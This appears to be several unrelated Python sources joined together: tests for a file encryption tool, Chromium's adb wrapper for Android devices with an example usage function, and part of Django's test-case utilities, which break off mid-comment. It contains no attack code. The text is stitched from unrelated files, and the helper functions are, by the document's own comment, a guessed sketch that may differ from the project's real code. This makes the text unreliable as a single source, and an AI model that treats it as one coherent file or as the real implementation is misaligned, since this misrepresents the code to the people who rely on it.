self.file_contents[test_file_path] == f.read() def test_single_relative_overwrite_false(self): """ Simple auto-gen key; relative paths; answer no to overwrite the source file """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file; mock responds no to overwrite the existing file with mock.patch('__builtin__.raw_input', return_value='n'): # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # ensure no file has been decrypted assert self.file_timestamps[test_file_path] == os.stat(test_file_path).st_ctime def test_single_relative_output_dir(self): """ Simple auto-gen key; relative paths; deletes source file; change output directory """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[test_file_path], outputfile='sesame.encrypted', keys=[self.key], ) # create a new temporary directory to extract into with make_secure_temp_directory() as output_dir: # decrypt the test file decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=output_dir ) # ensure file has been created in the output_dir assert os.path.exists(os.path.join(output_dir, test_file_path)) # verify decrypted contents with open(os.path.join(output_dir, test_file_path), 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_single_absolute(self): """ Simple auto-gen key; absolute paths """ # use only the first test file test_file_path = self.file_contents.keys()[0] with cd(self.working_dir): # encrypt the test file encrypt( inputfiles=[os.path.join(self.working_dir, test_file_path)], outputfile=os.path.join(self.working_dir, 'sesame.encrypted'), keys=[self.key], ) # delete the source file os.remove(test_file_path) # sleep before decrypt to ensure file ctime is different time.sleep(1) # decrypt the test file decrypt( inputfile=os.path.join(self.working_dir, 'sesame.encrypted'), keys=[self.key], output_dir=os.getcwd(), # default in argparse ) # the file will be extracted on the absolute path test_file_path_abs = os.path.join(self.working_dir, test_file_path)[1:] # verify decrypted contents at the absolute extracted path with open(test_file_path_abs, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_multiple_relative(self): """ Test a directory hierarchy with relative paths """ with cd(self.working_dir): # encrypt all the test files encrypt( inputfiles=self.file_contents.keys(), outputfile='sesame.encrypted', keys=[self.key], ) # delete the source files for path in self.file_contents.keys(): delete_path(path) # decrypt the test files decrypt( inputfile='sesame.encrypted', keys=[self.key], output_dir=os.getcwd(), # default in argparse ) for test_file_path in self.file_contents.keys(): # ensure files have been created assert os.path.exists(test_file_path) # verify decrypted contents with open(test_file_path, 'r') as f: assert self.file_contents[test_file_path] == f.read() def test_multiple_absolute(self): """ Test a directory hierarchy with absolute paths """ # convert the files list to absolute paths test_input_files = [ os.path.join(self.working_dir, path) for path in self.file_contents.keys() ] with cd(self.working_dir): # encrypt all the test files 
            encrypt(
                inputfiles=test_input_files,
                outputfile='sesame.encrypted',
                keys=[self.key],
            )

            # delete the source files
            for path in self.file_contents.keys():
                delete_path(path)

            # decrypt the test files
            decrypt(
                inputfile='sesame.encrypted',
                keys=[self.key],
                output_dir=os.getcwd(),  # default in argparse
            )

            for test_file_path in self.file_contents.keys():
                # the file will be extracted on the absolute path
                test_file_path_abs = os.path.join(self.working_dir, test_file_path)[1:]

                # verify decrypted contents at the absolute extracted path
                with open(test_file_path_abs, 'r') as f:
                    assert self.file_contents[test_file_path] == f.read()
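# ---------------------------------------------------------------------------
# The helpers imported from `utils` above (cd, mkdir_p, delete_path) are not
# shown in this file. The definitions below are a plausible sketch written
# only to make the tests easier to follow; the project's real implementations
# may differ.
import contextlib
import errno
import os
import shutil

@contextlib.contextmanager
def cd(path):
    """Temporarily change the working directory, restoring it afterwards."""
    previous = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(previous)

def mkdir_p(path):
    """Create `path` and any missing parents; do nothing if it already exists."""
    if not path:
        return
    try:
        os.makedirs(path)
    except OSError as e:
        if e.errno != errno.EEXIST:
            raise

def delete_path(path):
    """Remove a file or an entire directory tree."""
    if os.path.isdir(path):
        shutil.rmtree(path)
    elif os.path.exists(path):
        os.remove(path)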
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """This module wraps Android's adb tool. This is a thin wrapper around the adb interface. Any additional complexity should be delegated to a higher level (ex. DeviceUtils). """ import errno import os from pylib import cmd_helper from pylib.utils import reraiser_thread from pylib.utils import timeout_retry _DEFAULT_TIMEOUT = 30 _DEFAULT_RETRIES = 2 class BaseError(Exception): """Base exception for all device and command errors.""" pass class CommandFailedError(BaseError): """Exception for command failures.""" def __init__(self, cmd, msg, device=None): super(CommandFailedError, self).__init__( (('device %s: ' % device) if device else '') + 'adb command \'%s\' failed with message: \'%s\'' % (' '.join(cmd), msg)) class CommandTimeoutError(BaseError): """Exception for command timeouts.""" pass def _VerifyLocalFileExists(path): """Verifies a local file exists. Args: path: Path to the local file. Raises: IOError: If the file doesn't exist. """ if not os.path.exists(path): raise IOError(errno.ENOENT, os.strerror(errno.ENOENT), path) class AdbWrapper(object): """A wrapper around a local Android Debug Bridge executable.""" def __init__(self, device_serial): """Initializes the AdbWrapper. Args: device_serial: The device serial number as a string. """ self._device_serial = str(device_serial) @classmethod def _AdbCmd(cls, arg_list, timeout, retries, check_error=True): """Runs an adb command with a timeout and retries. Args: arg_list: A list of arguments to adb. timeout: Timeout in seconds. retries: Number of retries. check_error: Check that the command doesn't return an error message. This does NOT check the return code of shell commands. Returns: The output of the command. """ cmd = ['adb'] + arg_list # This method runs inside the timeout/retries. def RunCmd(): exit_code, output = cmd_helper.GetCmdStatusAndOutput(cmd) if exit_code != 0: raise CommandFailedError( cmd, 'returned non-zero exit code %s, output: %s' % (exit_code, output)) # This catches some errors, including when the device drops offline; # unfortunately adb is very inconsistent with error reporting so many # command failures present differently. if check_error and output[:len('error:')] == 'error:': raise CommandFailedError(arg_list, output) return output try: return timeout_retry.Run(RunCmd, timeout, retries) except reraiser_thread.TimeoutError as e: raise CommandTimeoutError(str(e)) def _DeviceAdbCmd(self, arg_list, timeout, retries, check_error=True): """Runs an adb command on the device associated with this object. Args: arg_list: A list of arguments to adb. timeout: Timeout in seconds. retries: Number of retries. check_error: Check that the command doesn't return an error message. This does NOT check the return code of shell commands. Returns: The output of the command. """ return self._AdbCmd( ['-s', self._device_serial] + arg_list, timeout, retries, check_error=check_error) def __eq__(self, other): """Consider instances equal if they refer to the same device. Args: other: The instance to compare equality with. Returns: True if the instances are considered equal, false otherwise. """ return self._device_serial == str(other) def __str__(self): """The string representation of an instance. Returns: The device serial number as a string. 
""" return self._device_serial def __repr__(self): return '%s(\'%s\')' % (self.__class__.__name__, self) # TODO(craigdh): Determine the filter criteria that should be supported. @classmethod def GetDevices(cls, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get the list of active attached devices. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Yields: AdbWrapper instances. """ output = cls._AdbCmd(['devices'], timeout, retries) lines = [line.split() for line in output.split('\n')] return [AdbWrapper(line[0]) for line in lines if len(line) == 2 and line[1] == 'device'] def GetDeviceSerial(self): """Gets the device serial number associated with this object. Returns: Device serial number as a string. """ return self._device_serial def Push(self, local, remote, timeout=60*5, retries=_DEFAULT_RETRIES): """Pushes a file from the host to the device. Args: local: Path on the host filesystem. remote: Path on the device filesystem. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(local) self._DeviceAdbCmd(['push', local, remote], timeout, retries) def Pull(self, remote, local, timeout=60*5, retries=_DEFAULT_RETRIES): """Pulls a file from the device to the host. Args: remote: Path on the device filesystem. local: Path on the host filesystem. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ self._DeviceAdbCmd(['pull', remote, local], timeout, retries) _VerifyLocalFileExists(local) def Shell(self, command, expect_rc=None, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Runs a shell command on the device. Args: command: The shell command to run. expect_rc: (optional) If set checks that the command's return code matches this value. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: The output of the shell command as a string. Raises: CommandFailedError: If the return code doesn't match |expect_rc|. """ if expect_rc is None: actual_command = command else: actual_command = '%s; echo $?;' % command output = self._DeviceAdbCmd( ['shell', actual_command], timeout, retries, check_error=False) if expect_rc is not None: output_end = output.rstrip().rfind('\n') + 1 rc = output[output_end:].strip() output = output[:output_end] if int(rc) != expect_rc: raise CommandFailedError( ['shell', command], 'shell command exited with code: %s' % rc, self._device_serial) return output def Logcat(self, filter_spec=None, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get the logcat output. Args: filter_spec: (optional) Spec to filter the logcat. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: logcat output as a string. """ cmd = ['logcat'] if filter_spec is not None: cmd.append(filter_spec) return self._DeviceAdbCmd(cmd, timeout, retries, check_error=False) def Forward(self, local, remote, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Forward socket connections from the local socket to the remote socket. Sockets are specified by one of: tcp:<port> localabstract:<unix domain socket name> localreserved:<unix domain socket name> localfilesystem:<unix domain socket name> dev:<character device name> jdwp:<process pid> (remote only) Args: local: The host socket. remote: The device socket. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. 
""" self._DeviceAdbCmd(['forward', str(local), str(remote)], timeout, retries) def JDWP(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """List of PIDs of processes hosting a JDWP transport. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: A list of PIDs as strings. """ return [a.strip() for a in self._DeviceAdbCmd(['jdwp'], timeout, retries).split('\n')] def Install(self, apk_path, forward_lock=False, reinstall=False, sd_card=False, timeout=60*2, retries=_DEFAULT_RETRIES): """Install an apk on the device. Args: apk_path: Host path to the APK file. forward_lock: (optional) If set forward-locks the app. reinstall: (optional) If set reinstalls the app, keeping its data. sd_card: (optional) If set installs on the SD card. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(apk_path) cmd = ['install'] if forward_lock: cmd.append('-l') if reinstall: cmd.append('-r') if sd_card: cmd.append('-s') cmd.append(apk_path) output = self._DeviceAdbCmd(cmd, timeout, retries) if 'Success' not in output: raise CommandFailedError(cmd, output) def Uninstall(self, package, keep_data=False, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Remove the app |package| from the device. Args: package: The package to uninstall. keep_data: (optional) If set keep the data and cache directories. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ cmd = ['uninstall'] if keep_data: cmd.append('-k') cmd.append(package) output = self._DeviceAdbCmd(cmd, timeout, retries) if 'Failure' in output: raise CommandFailedError(cmd, output) def Backup(self, path, packages=None, apk=False, shared=False, nosystem=True, include_all=False, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Write an archive of the device's data to |path|. Args: path: Local path to store the backup file. packages: List of to packages to be backed up. apk: (optional) If set include the .apk files in the archive. shared: (optional) If set buckup the device's SD card. nosystem: (optional) If set exclude system applications. include_all: (optional) If set back up all installed applications and |packages| is optional. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ cmd = ['backup', path] if apk: cmd.append('-apk') if shared: cmd.append('-shared') if nosystem: cmd.append('-nosystem') if include_all: cmd.append('-all') if packages: cmd.extend(packages) assert bool(packages) ^ bool(include_all), ( 'Provide \'packages\' or set \'include_all\' but not both.') ret = self._DeviceAdbCmd(cmd, timeout, retries) _VerifyLocalFileExists(path) return ret def Restore(self, path, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Restore device contents from the backup archive. Args: path: Host path to the backup archive. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ _VerifyLocalFileExists(path) self._DeviceAdbCmd(['restore'] + [path], timeout, retries) def WaitForDevice(self, timeout=60*5, retries=_DEFAULT_RETRIES): """Block until the device is online. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ self._DeviceAdbCmd(['wait-for-device'], timeout, retries) def GetState(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Get device state. 
Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: One of 'offline', 'bootloader', or 'device'. """ return self._DeviceAdbCmd(['get-state'], timeout, retries).strip() def GetDevPath(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Gets the device path. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. Returns: The device path (e.g. usb:3-4) """ return self._DeviceAdbCmd(['get-devpath'], timeout, retries) def Remount(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Remounts the /system partition on the device read-write.""" self._DeviceAdbCmd(['remount'], timeout, retries) def Reboot(self, to_bootloader=False, timeout=60*5, retries=_DEFAULT_RETRIES): """Reboots the device. Args: to_bootloader: (optional) If set reboots to the bootloader. timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ if to_bootloader: cmd = ['reboot-bootloader'] else: cmd = ['reboot'] self._DeviceAdbCmd(cmd, timeout, retries) def Root(self, timeout=_DEFAULT_TIMEOUT, retries=_DEFAULT_RETRIES): """Restarts the adbd daemon with root permissions, if possible. Args: timeout: (optional) Timeout per try in seconds. retries: (optional) Number of retries to attempt. """ output = self._DeviceAdbCmd(['root'], timeout, retries) if 'cannot' in output: raise CommandFailedError(['root'], output)
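# ---------------------------------------------------------------------------
# Example usage of the AdbWrapper defined above, kept as a sketch: it assumes
# `adb` is on PATH and at least one device is attached, and the local file
# paths and package name are placeholders (the pushed file and APK must exist
# for Push/Install to pass _VerifyLocalFileExists).
def _example_adb_session():
  devices = AdbWrapper.GetDevices()
  if not devices:
    return None

  adb = devices[0]
  adb.WaitForDevice()

  # Push a local file and read it back through the shell, checking the
  # command's return code.
  adb.Push('/tmp/hello.txt', '/data/local/tmp/hello.txt')
  contents = adb.Shell('cat /data/local/tmp/hello.txt', expect_rc=0)

  # Install a placeholder APK (reinstalling keeps app data), then remove it.
  adb.Install('/tmp/example.apk', reinstall=True)
  adb.Uninstall('com.example.app')
  return contents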
from __future__ import unicode_literals from copy import copy import difflib import errno from functools import wraps import json import os import re import sys try: from urllib.parse import urlsplit, urlunsplit except ImportError: # Python 2 from urlparse import urlsplit, urlunsplit import select import socket import threading import warnings from django.conf import settings from django.contrib.staticfiles.handlers import StaticFilesHandler from django.core import mail from django.core.exceptions import ValidationError, ImproperlyConfigured from django.core.handlers.wsgi import WSGIHandler from django.core.management import call_command from django.core.management.color import no_style from django.core.servers.basehttp import (WSGIRequestHandler, WSGIServer, WSGIServerException) from django.core.urlresolvers import clear_url_caches, set_urlconf from django.db import connection, connections, DEFAULT_DB_ALIAS, transaction from django.forms.fields import CharField from django.http import QueryDict from django.test import _doctest as doctest from django.test.client import Client from django.test.html import HTMLParseError, parse_html from django.test.signals import template_rendered from django.test.utils import (CaptureQueriesContext, ContextList, override_settings, compare_xml, strip_quotes) from django.utils import six, unittest as ut2 from django.utils.encoding import force_text from django.utils.unittest import skipIf # Imported here for backward compatibility from django.utils.unittest.util import safe_repr from django.views.static import serve __all__ = ('DocTestRunner', 'OutputChecker', 'TestCase', 'TransactionTestCase', 'SimpleTestCase', 'skipIfDBFeature', 'skipUnlessDBFeature') normalize_long_ints = lambda s: re.sub(r'(?<![\w])(\d+)L(?![\w])', '\\1', s) normalize_decimals = lambda s: re.sub(r"Decimal\('(\d+(\.\d*)?)'\)", lambda m: "Decimal(\"%s\")" % m.groups()[0], s) def to_list(value): """ Puts value into a list if it's not already one. Returns an empty list if value is None. """ if value is None: value = [] elif not isinstance(value, list): value = [value] return value real_commit = transaction.commit real_rollback = transaction.rollback real_enter_transaction_management = transaction.enter_transaction_management real_leave_transaction_management = transaction.leave_transaction_management real_abort = transaction.abort def nop(*args, **kwargs): return def disable_transaction_methods(): transaction.commit = nop transaction.rollback = nop transaction.enter_transaction_management = nop transaction.leave_transaction_management = nop transaction.abort = nop def restore_transaction_methods(): transaction.commit = real_commit transaction.rollback = real_rollback transaction.enter_transaction_management = real_enter_transaction_management transaction.leave_transaction_management = real_leave_transaction_management transaction.abort = real_abort def assert_and_parse_html(self, html, user_msg, msg): try: dom = parse_html(html) except HTMLParseError as e: standardMsg = '%s\n%s' % (msg, e.msg) self.fail(self._formatMessage(user_msg, standardMsg)) return dom class OutputChecker(doctest.OutputChecker): def check_output(self, want, got, optionflags): """ The entry method for doctest output checking. 
Defers to a sequence of child checkers """ checks = (self.check_output_default, self.check_output_numeric, self.check_output_xml, self.check_output_json) for check in checks: if check(want, got, optionflags): return True return False def check_output_default(self, want, got, optionflags): """ The default comparator provided by doctest - not perfect, but good for most purposes """ return doctest.OutputChecker.check_output(self, want, got, optionflags) def check_output_numeric(self, want, got, optionflags): """Doctest does an exact string comparison of output, which means that some numerically equivalent values aren't equal. This check normalizes * long integers (22L) so that they equal normal integers. (22) * Decimals so that they are comparable, regardless of the change made to __repr__ in Python 2.6. """ return doctest.OutputChecker.check_output(self, normalize_decimals(normalize_long_ints(want)), normalize_decimals(normalize_long_ints(got)), optionflags) def check_output_xml(self, want, got, optionsflags): try: return compare_xml(want, got) except Exception: return False def check_output_json(self, want, got, optionsflags): """ Tries to compare want and got as if they were JSON-encoded data """ want, got = strip_quotes(want, got) try: want_json = json.loads(want) got_json = json.loads(got) except Exception: return False return want_json == got_json class DocTestRunner(doctest.DocTestRunner): def __init__(self, *args, **kwargs): doctest.DocTestRunner.__init__(self, *args, **kwargs) self.optionflags = doctest.ELLIPSIS class _AssertNumQueriesContext(CaptureQueriesContext): def __init__(self, test_case, num, connection): self.test_case = test_case self.num = num super(_AssertNumQueriesContext, self).__init__(connection) def __exit__(self, exc_type, exc_value, traceback): super(_AssertNumQueriesContext, self).__exit__(exc_type, exc_value, traceback) if exc_type is not None: return executed = len(self) self.test_case.assertEqual( executed, self.num, "%d queries executed, %d expected" % ( executed, self.num ) ) class _AssertTemplateUsedContext(object): def __init__(self, test_case, template_name): self.test_case = test_case self.template_name = template_name self.rendered_templates = [] self.rendered_template_names = [] self.context = ContextList() def on_template_render(self, sender, signal, template, context, **kwargs): self.rendered_templates.append(template) self.rendered_template_names.append(template.name) self.context.append(copy(context)) def test(self): return self.template_name in self.rendered_template_names def message(self): return '%s was not rendered.' % self.template_name def __enter__(self): template_rendered.connect(self.on_template_render) return self def __exit__(self, exc_type, exc_value, traceback): template_rendered.disconnect(self.on_template_render) if exc_type is not None: return if not self.test(): message = self.message() if len(self.rendered_templates) == 0: message += ' No template was rendered.' else: message += ' Following templates were rendered: %s' % ( ', '.join(self.rendered_template_names)) self.test_case.fail(message) class _AssertTemplateNotUsedContext(_AssertTemplateUsedContext): def test(self): return self.template_name not in self.rendered_template_names def message(self): return '%s was rendered.' % self.template_name class SimpleTestCase(ut2.TestCase): _warn_txt = ("save_warnings_state/restore_warnings_state " "django.test.*TestCase methods are deprecated. 
Use Python's " "warnings.catch_warnings context manager instead.") def __call__(self, result=None): """ Wrapper around default __call__ method to perform common Django test set up. This means that user-defined Test Cases aren't required to include a call to super().setUp(). """ testMethod = getattr(self, self._testMethodName) skipped = (getattr(self.__class__, "__unittest_skip__", False) or getattr(testMethod, "__unittest_skip__", False)) if not skipped: try: self._pre_setup() except (KeyboardInterrupt, SystemExit): raise except Exception: result.addError(self, sys.exc_info()) return super(SimpleTestCase, self).__call__(result) if not skipped: try: self._post_teardown() except (KeyboardInterrupt, SystemExit): raise except Exception: result.addError(self, sys.exc_info()) return def _pre_setup(self): pass def _post_teardown(self): pass def save_warnings_state(self): """ Saves the state of the warnings module """ warnings.warn(self._warn_txt, DeprecationWarning, stacklevel=2) self._warnings_state = warnings.filters[:] def restore_warnings_state(self): """ Restores the state of the warnings module to the state saved by save_warnings_state() """ warnings.warn(self._warn_txt, DeprecationWarning, stacklevel=2) warnings.filters = self._warnings_state[:] def settings(self, **kwargs): """ A context manager that temporarily sets a setting and reverts back to the original value when exiting the context. """ return override_settings(**kwargs) def assertRaisesMessage(self, expected_exception, expected_message, callable_obj=None, *args, **kwargs): """ Asserts that the message in a raised exception matches the passed value. Args: expected_exception: Exception class expected to be raised. expected_message: expected error message string value. callable_obj: Function to be called. args: Extra args. kwargs: Extra kwargs. """ return six.assertRaisesRegex(self, expected_exception, re.escape(expected_message), callable_obj, *args, **kwargs) def assertFieldOutput(self, fieldclass, valid, invalid, field_args=None, field_kwargs=None, empty_value=''): """ Asserts that a form field behaves correctly with various inputs. Args: fieldclass: the class of the field to be tested. valid: a dictionary mapping valid inputs to their expected cleaned values. invalid: a dictionary mapping invalid inputs to one or more raised error messages. 
field_args: the args passed to instantiate the field field_kwargs: the kwargs passed to instantiate the field empty_value: the expected clean output for inputs in empty_values """ if field_args is None: field_args = [] if field_kwargs is None: field_kwargs = {} required = fieldclass(*field_args, **field_kwargs) optional = fieldclass(*field_args, **dict(field_kwargs, required=False)) # test valid inputs for input, output in valid.items(): self.assertEqual(required.clean(input), output) self.assertEqual(optional.clean(input), output) # test invalid inputs for input, errors in invalid.items(): with self.assertRaises(ValidationError) as context_manager: required.clean(input) self.assertEqual(context_manager.exception.messages, errors) with self.assertRaises(ValidationError) as context_manager: optional.clean(input) self.assertEqual(context_manager.exception.messages, errors) # test required inputs error_required = [force_text(required.error_messages['required'])] for e in required.empty_values: with self.assertRaises(ValidationError) as context_manager: required.clean(e) self.assertEqual(context_manager.exception.messages, error_required) self.assertEqual(optional.clean(e), empty_value) # test that max_length and min_length are always accepted if issubclass(fieldclass, CharField): field_kwargs.update({'min_length':2, 'max_length':20}) self.assertTrue(isinstance(fieldclass(*field_args, **field_kwargs), fieldclass)) def assertHTMLEqual(self, html1, html2, msg=None): """ Asserts that two HTML snippets are semantically the same. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid HTML. """ dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:') dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:') if dom1 != dom2: standardMsg = '%s != %s' % ( safe_repr(dom1, True), safe_repr(dom2, True)) diff = ('\n' + '\n'.join(difflib.ndiff( six.text_type(dom1).splitlines(), six.text_type(dom2).splitlines()))) standardMsg = self._truncateMessage(standardMsg, diff) self.fail(self._formatMessage(msg, standardMsg)) def assertHTMLNotEqual(self, html1, html2, msg=None): """Asserts that two HTML snippets are not semantically equivalent.""" dom1 = assert_and_parse_html(self, html1, msg, 'First argument is not valid HTML:') dom2 = assert_and_parse_html(self, html2, msg, 'Second argument is not valid HTML:') if dom1 == dom2: standardMsg = '%s == %s' % ( safe_repr(dom1, True), safe_repr(dom2, True)) self.fail(self._formatMessage(msg, standardMsg)) def assertInHTML(self, needle, haystack, count = None, msg_prefix=''): needle = assert_and_parse_html(self, needle, None, 'First argument is not valid HTML:') haystack = assert_and_parse_html(self, haystack, None, 'Second argument is not valid HTML:') real_count = haystack.count(needle) if count is not None: self.assertEqual(real_count, count, msg_prefix + "Found %d instances of '%s' in response" " (expected %d)" % (real_count, needle, count)) else: self.assertTrue(real_count != 0, msg_prefix + "Couldn't find '%s' in response" % needle) def assertJSONEqual(self, raw, expected_data, msg=None): try: data = json.loads(raw) except ValueError: self.fail("First argument is not valid JSON: %r" % raw) if isinstance(expected_data, six.string_types): try: expected_data = json.loads(expected_data) except ValueError: self.fail("Second argument is not valid JSON: %r" % expected_data) self.assertEqual(data, expected_data, msg=msg) def assertXMLEqual(self, xml1, xml2, 
msg=None): """ Asserts that two XML snippets are semantically the same. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid XML. """ try: result = compare_xml(xml1, xml2) except Exception as e: standardMsg = 'First or second argument is not valid XML\n%s' % e self.fail(self._formatMessage(msg, standardMsg)) else: if not result: standardMsg = '%s != %s' % (safe_repr(xml1, True), safe_repr(xml2, True)) self.fail(self._formatMessage(msg, standardMsg)) def assertXMLNotEqual(self, xml1, xml2, msg=None): """ Asserts that two XML snippets are not semantically equivalent. Whitespace in most cases is ignored, and attribute ordering is not significant. The passed-in arguments must be valid XML. """ try: result = compare_xml(xml1, xml2) except Exception as e: standardMsg = 'First or second argument is not valid XML\n%s' % e self.fail(self._formatMessage(msg, standardMsg)) else: if result: standardMsg = '%s == %s' % (safe_repr(xml1, True), safe_repr(xml2, True)) self.fail(self._formatMessage(msg, standardMsg)) class TransactionTestCase(SimpleTestCase): # The class we'll use for the test client self.client. # Can be overridden in derived classes. client_class = Client # Subclasses can ask for resetting of auto increment sequence before each # test case reset_sequences = False def _pre_setup(self): """Performs any pre-test setup. This includes: * Flushing the database. * If the Test Case class has a 'fixtures' member, installing the named fixtures. * If the Test Case class has a 'urls' member, replace the ROOT_URLCONF with it. * Clearing the mail test outbox. """ self.client = self.client_class() self._fixture_setup() self._urlconf_setup() mail.outbox = [] def _databases_names(self, include_mirrors=True): # If the test case has a multi_db=True flag, act on all databases, # including mirrors or not. Otherwise, just on the default DB. if getattr(self, 'multi_db', False): return [alias for alias in connections if include_mirrors or not connections[alias].settings_dict['TEST_MIRROR']] else: return [DEFAULT_DB_ALIAS] def _reset_sequences(self, db_name): conn = connections[db_name] if conn.features.supports_sequence_reset: sql_list = \ conn.ops.sequence_reset_by_name_sql(no_style(), conn.introspection.sequence_list()) if sql_list: with transaction.commit_on_success_unless_managed(using=db_name): cursor = conn.cursor() for sql in sql_list: cursor.execute(sql) def _fixture_setup(self): for db_name in self._databases_names(include_mirrors=False): # Reset sequences if self.reset_sequences: self._reset_sequences(db_name) if hasattr(self, 'fixtures'): # We have to use this slightly awkward syntax due to the fact # that we're using *args and **kwargs together. call_command('loaddata', *self.fixtures, **{'verbosity': 0, 'database': db_name, 'skip_validation': True}) def _urlconf_setup(self): set_urlconf(None) if hasattr(self, 'urls'): self._old_root_urlconf = settings.ROOT_URLCONF settings.ROOT_URLCONF = self.urls clear_url_caches() def _post_teardown(self): """ Performs any post-test things. This includes: * Putting back the original ROOT_URLCONF if it was changed. * Force closing the connection, so that the next test gets a clean cursor. """ self._fixture_teardown() self._urlconf_teardown() # Some DB cursors include SQL statements as part of cursor # creation. 
If you have a test that does rollback, the effect # of these statements is lost, which can effect the operation # of tests (e.g., losing a timezone setting causing objects to # be created with the wrong time). # To make sure this doesn't happen, get a clean connection at the # start of every test. for conn in connections.all(): conn.close() def _fixture_teardown(self): for db in self._databases_names(include_mirrors=False): call_command('flush', verbosity=0, interactive=False, database=db, skip_validation=True, reset_sequences=False) def _urlconf_teardown(self): set_urlconf(None) if hasattr(self, '_old_root_urlconf'): settings.ROOT_URLCONF = self._old_root_urlconf clear_url_caches() def assertRedirects(self, response, expected_url, status_code=302, target_status_code=200, host=None, msg_prefix=''): """Asserts that a response redirected to a specific URL, and that the redirect URL can be loaded. Note that assertRedirects won't work for external links since it uses TestClient to do a request. """ if msg_prefix: msg_prefix += ": " if hasattr(response, 'redirect_chain'): # The request was a followed redirect self.assertTrue(len(response.redirect_chain) > 0, msg_prefix + "Response didn't redirect as expected: Response" " code was %d (expected %d)" % (response.status_code, status_code)) self.assertEqual(response.redirect_chain[0][1], status_code, msg_prefix + "Initial response didn't redirect as expected:" " Response code was %d (expected %d)" % (response.redirect_chain[0][1], status_code)) url, status_code = response.redirect_chain[-1] self.assertEqual(response.status_code, target_status_code, msg_prefix + "Response didn't redirect as expected: Final" " Response code was %d (expected %d)" % (response.status_code, target_status_code)) else: # Not a followed redirect self.assertEqual(response.status_code, status_code, msg_prefix + "Response didn't redirect as expected: Response" " code was %d (expected %d)" % (response.status_code, status_code)) url = response.url scheme, netloc, path, query, fragment = urlsplit(url) redirect_response = response.client.get(path, QueryDict(query)) # Get the redirection page, using the same client that was used # to obtain the original response. self.assertEqual(redirect_response.status_code, target_status_code, msg_prefix + "Couldn't retrieve redirection page '%s':" " response code was %d (expected %d)" % (path, redirect_response.status_code, target_status_code)) e_scheme, e_netloc, e_path, e_query, e_fragment = urlsplit( expected_url) if not (e_scheme or e_netloc): expected_url = urlunsplit(('http', host or 'testserver', e_path, e_query, e_fragment)) self.assertEqual(url, expected_url, msg_prefix + "Response redirected to '%s', expected '%s'" % (url, expected_url)) def assertContains(self, response, text, count=None, status_code=200, msg_prefix='', html=False): """ Asserts that a response indicates that some content was retrieved successfully, (i.e., the HTTP status code was as expected), and that ``text`` occurs ``count`` times in the content of the response. If ``count`` is None, the count doesn't matter - the assertion is true if the text occurs at least once in the response. """ # If the response supports deferred rendering and hasn't been rendered # yet, then ensure that it does get rendered before proceeding further. 
if (hasattr(response, 'render') and callable(response.render) and not response.is_rendered): response.render() if msg_prefix: msg_prefix += ": " self.assertEqual(response.status_code, status_code, msg_prefix + "Couldn't retrieve content: Response code was %d" " (expected %d)" % (response.status_code, status_code)) if response.streaming: content = b''.join(response.streaming_content) else: content = response.content if not isinstance(text, bytes) or html: text = force_text(text, encoding=response._charset) content = content.decode(response._charset) text_repr = "'%s'" % text else: text_repr = repr(text) if html: content = assert_and_parse_html(self, content, None, "Response's content is not valid HTML:") text = assert_and_parse_html(self, text, None, "Second argument is not valid HTML:") real_count = content.count(text) if count is not None: self.assertEqual(real_count, count, msg_prefix + "Found %d instances of %s in response" " (expected %d)" % (real_count, text_repr, count)) else: self.assertTrue(real_count != 0, msg_prefix + "Couldn't find %s in response" % text_repr) def assertNotContains(self, response, text, status_code=200, msg_prefix='', html=False): """ Asserts that a response indicates that some content was retrieved successfully, (i.e., the HTTP status code was as expected), and that ``text`` doesn't occurs in the content of the response. """ # If the response supports deferred rendering and hasn't been rendered # yet, then ensure that it does get rendered 